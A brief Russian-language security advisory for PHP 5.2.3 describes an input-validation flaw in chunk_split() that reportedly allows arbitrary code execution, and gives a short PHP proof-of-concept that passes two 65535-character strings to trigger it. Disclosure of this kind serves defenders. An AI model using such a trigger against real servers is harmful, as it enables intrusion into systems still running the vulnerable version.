Программа: PHP 5.2.3

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в функции Chunk_Split(). Атакующий может передать специально сформированные данные, что приведет к выполнению произвольного кода.

Пример:

<?
          $a=str_repeat("A", 65535);
          $b=1;
          $c=str_repeat("A", 65535);
          chunk_split($a,$b,$c);
?>



Оставить мнение